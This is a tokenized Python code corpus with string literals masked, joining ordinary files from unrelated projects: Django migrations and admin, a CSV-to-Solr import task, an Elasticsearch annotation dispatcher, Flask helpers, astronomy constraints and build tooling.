'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , 
{ '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:end>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:start>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : 
"<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import logging <EOL> from math import floor <EOL> import time <EOL> from csvkit import CSVKitReader <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext <EOL> from livesettings import config_value <EOL> from panda import solr , utils <EOL> from panda . exceptions import DataImportError <EOL> from panda . tasks . import_file import ImportFileTask <EOL> from panda . utils . typecoercion import DataTyper <EOL> SOLR_ADD_BUFFER_SIZE = <NUM_LIT> <EOL> class ImportCSVTask ( ImportFileTask ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> def _count_lines ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> with open ( filename ) as f : <EOL> for i , l in enumerate ( f ) : <EOL> pass <EOL> return i + <NUM_LIT:1> <EOL> def run ( self , dataset_slug , upload_id , external_id_field_index = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> from panda . models import Dataset , DataUpload <EOL> log = logging . getLogger ( self . name ) <EOL> log . info ( '<STR_LIT>' % dataset_slug ) <EOL> try : <EOL> dataset = Dataset . objects . get ( slug = dataset_slug ) <EOL> except Dataset . DoesNotExist : <EOL> log . warning ( '<STR_LIT>' % dataset_slug ) <EOL> return <EOL> upload = DataUpload . objects . get ( id = upload_id ) <EOL> task_status = dataset . current_task <EOL> task_status . begin ( ugettext ( '<STR_LIT>' ) ) <EOL> line_count = self . _count_lines ( upload . get_path ( ) ) <EOL> if self . is_aborted ( ) : <EOL> task_status . abort ( '<STR_LIT>' ) <EOL> log . warning ( '<STR_LIT>' % dataset_slug ) <EOL> return <EOL> f = open ( upload . get_path ( ) , '<STR_LIT:r>' ) <EOL> reader = CSVKitReader ( f , encoding = upload . encoding , ** upload . dialect_as_parameters ( ) ) <EOL> reader . next ( ) <EOL> add_buffer = [ ] <EOL> data_typer = DataTyper ( dataset . 
column_schema ) <EOL> throttle = config_value ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> i = <NUM_LIT:0> <EOL> while True : <EOL> i += <NUM_LIT:1> <EOL> try : <EOL> row = reader . next ( ) <EOL> except StopIteration : <EOL> i -= <NUM_LIT:1> <EOL> break <EOL> except UnicodeDecodeError : <EOL> raise DataImportError ( ugettext ( '<STR_LIT>' ) % { '<STR_LIT>' : upload . encoding , '<STR_LIT>' : i } ) <EOL> external_id = None <EOL> if external_id_field_index is not None : <EOL> external_id = row [ external_id_field_index ] <EOL> data = utils . solr . make_data_row ( dataset , row , data_upload = upload , external_id = external_id ) <EOL> data = data_typer ( data , row ) <EOL> add_buffer . append ( data ) <EOL> if i % SOLR_ADD_BUFFER_SIZE == <NUM_LIT:0> : <EOL> solr . add ( settings . SOLR_DATA_CORE , add_buffer ) <EOL> add_buffer = [ ] <EOL> task_status . update ( ugettext ( '<STR_LIT>' ) % floor ( float ( i ) / float ( line_count ) * <NUM_LIT:100> ) ) <EOL> if self . is_aborted ( ) : <EOL> task_status . abort ( ugettext ( '<STR_LIT>' ) % floor ( float ( i ) / float ( line_count ) * <NUM_LIT:100> ) ) <EOL> log . warning ( '<STR_LIT>' % dataset_slug ) <EOL> return <EOL> time . sleep ( throttle ) <EOL> if add_buffer : <EOL> solr . add ( settings . SOLR_DATA_CORE , add_buffer ) <EOL> add_buffer = [ ] <EOL> solr . commit ( settings . SOLR_DATA_CORE ) <EOL> f . close ( ) <EOL> task_status . update ( '<STR_LIT>' ) <EOL> try : <EOL> dataset = Dataset . objects . get ( slug = dataset_slug ) <EOL> except Dataset . DoesNotExist : <EOL> log . warning ( '<STR_LIT>' % dataset_slug ) <EOL> return <EOL> if not dataset . row_count : <EOL> dataset . row_count = i <EOL> else : <EOL> dataset . row_count += i <EOL> dataset . column_schema = data_typer . schema <EOL> dataset . save ( ) <EOL> upload = DataUpload . objects . get ( id = upload_id ) <EOL> upload . imported = True <EOL> upload . save ( ) <EOL> log . info ( '<STR_LIT>' % dataset_slug ) <EOL> return data_typer </s>
<s> import datetime <EOL> from django . test import TestCase <EOL> from panda import solr as solrjson <EOL> class TestSolrJSONEncoder ( TestCase ) : <EOL> def test_datetime ( self ) : <EOL> v = { '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:11> , <NUM_LIT:11> , <NUM_LIT:3> , <NUM_LIT:0> ) } <EOL> self . assertEqual ( solrjson . dumps ( v ) , '<STR_LIT>' ) <EOL> def test_date ( self ) : <EOL> v = { '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:11> ) } <EOL> self . assertEqual ( solrjson . dumps ( v ) , '<STR_LIT>' ) <EOL> def test_time ( self ) : <EOL> v = { '<STR_LIT:time>' : datetime . time ( <NUM_LIT:11> , <NUM_LIT:3> , <NUM_LIT:0> ) } <EOL> self . assertEqual ( solrjson . dumps ( v ) , '<STR_LIT>' ) <EOL> def test_int ( self ) : <EOL> v = { '<STR_LIT:int>' : <NUM_LIT> } <EOL> self . assertEqual ( solrjson . dumps ( v ) , '<STR_LIT>' ) </s>
<s> import sys <EOL> import os <EOL> import os . path <EOL> import re <EOL> from elasticsearch import Elasticsearch <EOL> from time import sleep <EOL> from muppet import DurableChannel , RemoteChannel <EOL> esStopWords = [ "<STR_LIT:a>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:to>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> __name__ = "<STR_LIT>" <EOL> class AnnotationDispatcher : <EOL> def __init__ ( self , config , processingStartIndex , processingEndIndex ) : <EOL> self . config = config <EOL> self . logger = config [ "<STR_LIT>" ] <EOL> self . esClient = Elasticsearch ( config [ "<STR_LIT>" ] [ "<STR_LIT:host>" ] + "<STR_LIT::>" + str ( config [ "<STR_LIT>" ] [ "<STR_LIT:port>" ] ) ) <EOL> self . bagOfPhrases = { } <EOL> self . corpusIndex = config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] <EOL> self . corpusType = config [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] <EOL> self . corpusFields = config [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> self . corpusSize = <NUM_LIT:0> <EOL> self . processorIndex = config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] <EOL> self . processorType = config [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] <EOL> self . processorPhraseType = config [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] + "<STR_LIT>" <EOL> self . processingPageSize = config [ "<STR_LIT>" ] <EOL> self . analyzerIndex = self . corpusIndex + "<STR_LIT>" <EOL> self . config [ "<STR_LIT>" ] = processingStartIndex <EOL> self . config [ "<STR_LIT>" ] = processingEndIndex <EOL> self . config [ "<STR_LIT>" ] = self . processingPageSize <EOL> self . totalDocumentsDispatched = <NUM_LIT:0> <EOL> self . documentsAnnotated = <NUM_LIT:0> <EOL> self . 
documentsNotAnnotated = <NUM_LIT:0> <EOL> self . lastDispatcher = False <EOL> self . endProcess = False <EOL> self . dispatcherName = "<STR_LIT>" <EOL> self . workerName = "<STR_LIT>" <EOL> self . timeout = <NUM_LIT> <EOL> if processingEndIndex != None : <EOL> self . dispatcherName += "<STR_LIT:.>" + str ( processingStartIndex ) + "<STR_LIT:.>" + str ( processingEndIndex ) <EOL> analyzerIndexSettings = { <EOL> "<STR_LIT:index>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : config [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : config [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : ( config [ "<STR_LIT>" ] [ "<STR_LIT>" ] == <NUM_LIT:1> ) <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } <EOL> } <EOL> } <EOL> analyzerIndexTypeMapping = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT:string>" } , <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT:string>" , "<STR_LIT:index>" : "<STR_LIT>" } , <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT:string>" , "<STR_LIT:index>" : "<STR_LIT>" } <EOL> } <EOL> } <EOL> corpusSize = self . esClient . count ( index = self . corpusIndex , doc_type = self . corpusType , body = { "<STR_LIT>" : { "<STR_LIT>" : { } } } ) <EOL> self . corpusSize = corpusSize [ "<STR_LIT:count>" ] <EOL> self . featureNames = map ( lambda x : x [ "<STR_LIT:name>" ] , config [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> for module in config [ "<STR_LIT>" ] [ "<STR_LIT>" ] : <EOL> self . featureNames = self . featureNames + map ( lambda x : x [ "<STR_LIT:name>" ] , module [ "<STR_LIT>" ] ) <EOL> if processingStartIndex == <NUM_LIT:0> : <EOL> if self . esClient . indices . exists ( self . 
analyzerIndex ) : <EOL> self . esClient . indices . delete ( self . analyzerIndex ) <EOL> data = self . esClient . indices . create ( self . analyzerIndex , analyzerIndexSettings ) <EOL> if "<STR_LIT>" not in self . config or self . config [ "<STR_LIT>" ] == True : <EOL> try : <EOL> if self . esClient . indices . exists ( self . config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] ) : <EOL> self . esClient . indices . delete ( self . config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] ) <EOL> self . esClient . indices . create ( self . config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] ) <EOL> self . esClient . indices . put_mapping ( index = self . config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] , doc_type = self . processorPhraseType , body = analyzerIndexTypeMapping ) <EOL> if self . esClient . indices . exists ( self . analyzerIndex ) : <EOL> self . esClient . indices . delete ( self . analyzerIndex ) <EOL> data = self . esClient . indices . create ( self . analyzerIndex , analyzerIndexSettings ) <EOL> except : <EOL> error = sys . exc_info ( ) <EOL> self . logger . error ( "<STR_LIT>" + str ( error ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> sleep ( <NUM_LIT:1> ) <EOL> self . annotationDispatcher = DurableChannel ( self . dispatcherName , config , self . timeoutCallback ) <EOL> self . controlChannel = RemoteChannel ( self . dispatcherName , config ) <EOL> def dispatchToAnnotate ( self ) : <EOL> if "<STR_LIT>" in self . config and self . config [ "<STR_LIT>" ] == False : return <EOL> nextDocumentIndex = <NUM_LIT:0> <EOL> if self . config [ "<STR_LIT>" ] != None : nextDocumentIndex = self . config [ "<STR_LIT>" ] <EOL> endDocumentIndex = - <NUM_LIT:1> <EOL> if self . config [ "<STR_LIT>" ] != None : endDocumentIndex = self . config [ "<STR_LIT>" ] <EOL> if endDocumentIndex != - <NUM_LIT:1> and self . processingPageSize > ( endDocumentIndex - nextDocumentIndex ) : <EOL> self . processingPageSize = endDocumentIndex - nextDocumentIndex + <NUM_LIT:1> <EOL> self . 
totalDocumentsDispatched = <NUM_LIT:0> <EOL> while True : <EOL> documents = self . esClient . search ( index = self . corpusIndex , doc_type = self . corpusType , body = { "<STR_LIT>" : nextDocumentIndex , "<STR_LIT:size>" : self . processingPageSize , "<STR_LIT>" : { "<STR_LIT>" : { } } , "<STR_LIT>" : [ { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } ] } , fields = [ "<STR_LIT>" ] ) <EOL> if len ( documents [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) == <NUM_LIT:0> : <EOL> break <EOL> self . totalDocumentsDispatched += len ( documents [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> self . logger . info ( "<STR_LIT>" + str ( nextDocumentIndex ) + "<STR_LIT>" + str ( nextDocumentIndex + len ( documents [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) ) + "<STR_LIT>" ) <EOL> for document in documents [ "<STR_LIT>" ] [ "<STR_LIT>" ] : <EOL> self . logger . info ( "<STR_LIT>" + document [ "<STR_LIT>" ] ) <EOL> content = { "<STR_LIT>" : document [ "<STR_LIT>" ] , "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT:count>" : <NUM_LIT:1> , "<STR_LIT>" : self . dispatcherName } <EOL> self . annotationDispatcher . send ( content , self . workerName ) <EOL> nextDocumentIndex += len ( documents [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> if endDocumentIndex != - <NUM_LIT:1> and endDocumentIndex <= nextDocumentIndex : <EOL> break <EOL> self . logger . info ( str ( self . totalDocumentsDispatched ) + "<STR_LIT>" ) <EOL> while True : <EOL> message = self . annotationDispatcher . receive ( ) <EOL> if "<STR_LIT>" in message [ "<STR_LIT:content>" ] and message [ "<STR_LIT:content>" ] [ "<STR_LIT>" ] > <NUM_LIT:0> : <EOL> self . documentsAnnotated += <NUM_LIT:1> <EOL> self . annotationDispatcher . close ( message ) <EOL> self . logger . info ( "<STR_LIT>" + message [ "<STR_LIT:content>" ] [ "<STR_LIT>" ] + "<STR_LIT>" + str ( self . documentsAnnotated ) + "<STR_LIT:/>" + str ( self . totalDocumentsDispatched ) ) <EOL> if ( self . documentsAnnotated + self . documentsNotAnnotated ) >= self . 
totalDocumentsDispatched and not self . lastDispatcher : <EOL> self . controlChannel . send ( "<STR_LIT>" ) <EOL> self . annotationDispatcher . end ( ) <EOL> break <EOL> self . __terminate ( ) <EOL> def timeoutCallback ( self , message ) : <EOL> if message [ "<STR_LIT:content>" ] [ "<STR_LIT:count>" ] < <NUM_LIT:5> : <EOL> message [ "<STR_LIT:content>" ] [ "<STR_LIT:count>" ] += <NUM_LIT:1> <EOL> self . annotationDispatcher . send ( message [ "<STR_LIT:content>" ] , self . workerName , self . timeout ) <EOL> else : <EOL> self . documentsNotAnnotated += <NUM_LIT:1> <EOL> if self . documentsNotAnnotated == self . totalDocumentsDispatched or ( self . documentsAnnotated + self . documentsNotAnnotated ) == self . totalDocumentsDispatched : <EOL> self . __terminate ( ) <EOL> def __terminate ( self ) : <EOL> self . logger . info ( str ( self . totalDocumentsDispatched ) + "<STR_LIT>" ) <EOL> self . logger . info ( str ( self . documentsAnnotated ) + "<STR_LIT>" ) <EOL> self . logger . info ( str ( self . documentsNotAnnotated ) + "<STR_LIT>" ) <EOL> self . logger . info ( "<STR_LIT>" ) <EOL> self . logger . info ( "<STR_LIT>" ) <EOL> def __deleteAnalyzerIndex ( self ) : <EOL> if self . esClient . indices . exists ( self . analyzerIndex ) : <EOL> self . esClient . indices . delete ( self . analyzerIndex ) </s>
<s> from flask import Flask , Response <EOL> from werkzeug . routing import BaseConverter , ValidationError <EOL> from base64 import urlsafe_b64encode , urlsafe_b64decode <EOL> from bson . objectid import ObjectId <EOL> from bson . errors import InvalidId <EOL> import datetime <EOL> import mmh3 <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> try : <EOL> from bson . objectid import ObjectId <EOL> except : <EOL> pass <EOL> class APIEncoder ( json . JSONEncoder ) : <EOL> def default ( self , obj ) : <EOL> if isinstance ( obj , ( datetime . datetime , datetime . date ) ) : <EOL> return obj . ctime ( ) <EOL> elif isinstance ( obj , datetime . time ) : <EOL> return obj . isoformat ( ) <EOL> elif isinstance ( obj , ObjectId ) : <EOL> return str ( obj ) <EOL> return json . JSONEncoder . default ( self , obj ) <EOL> def jsonify ( data ) : <EOL> return Response ( json . dumps ( data , cls = APIEncoder ) , <EOL> mimetype = '<STR_LIT:application/json>' ) <EOL> class ObjectIDConverter ( BaseConverter ) : <EOL> def to_python ( self , value ) : <EOL> try : <EOL> return ObjectId ( urlsafe_b64decode ( value ) ) <EOL> except ( InvalidId , ValueError , TypeError ) : <EOL> raise ValidationError ( ) <EOL> def to_url ( self , value ) : <EOL> return urlsafe_b64encode ( value . binary ) <EOL> def genPrimaryKey64 ( data ) : <EOL> return "<STR_LIT>" % ( mmh3 . hash128 ( data ) & <NUM_LIT> ) </s>
<s> from ... utils import current_time <EOL> def observable ( target , observer ) : <EOL> """<STR_LIT>""" <EOL> if observer . target_is_up ( current_time ( ) , target , observer . horizon ) : <EOL> return ( <NUM_LIT:1> , True ) <EOL> return ( <NUM_LIT:0> , False ) <EOL> def moon_separation ( target , observer ) : <EOL> moon_sep = target . coord . separation ( observer . moon ) . value <EOL> if moon_sep < <NUM_LIT:15> : <EOL> return ( <NUM_LIT:0> , False ) <EOL> return ( moon_sep / <NUM_LIT> , True ) </s>
<s> import yaml <EOL> import os <EOL> import warnings <EOL> def load_config ( ) : <EOL> """<STR_LIT>""" <EOL> _config_file = '<STR_LIT>' . format ( os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> _local_config_file = '<STR_LIT>' . format ( os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> _config = dict ( ) <EOL> try : <EOL> with open ( _config_file , '<STR_LIT:r>' ) as f : <EOL> _config . update ( yaml . load ( f . read ( ) ) ) <EOL> except IOError as err : <EOL> warnings . warn ( '<STR_LIT>' . format ( err ) ) <EOL> try : <EOL> with open ( _local_config_file , '<STR_LIT:r>' ) as f : <EOL> _config . update ( yaml . load ( f . read ( ) ) ) <EOL> except IOError as err : <EOL> pass <EOL> return _config </s>
<s> from django . contrib import admin <EOL> from currencies . models import Currency <EOL> class CurrencyAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:code>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> list_filter = ( "<STR_LIT>" , ) <EOL> search_fields = ( "<STR_LIT:name>" , "<STR_LIT:code>" ) <EOL> admin . site . register ( Currency , CurrencyAdmin ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . task . task import Task <EOL> from pants . contrib . android . distribution . android_distribution import AndroidDistribution <EOL> class AndroidTask ( Task ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def register_options ( cls , register ) : <EOL> super ( AndroidTask , cls ) . register_options ( register ) <EOL> register ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( AndroidTask , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _sdk_path = self . get_options ( ) . sdk_path or None <EOL> @ property <EOL> def android_sdk ( self ) : <EOL> """<STR_LIT>""" <EOL> return AndroidDistribution . cached ( self . _sdk_path ) </s>
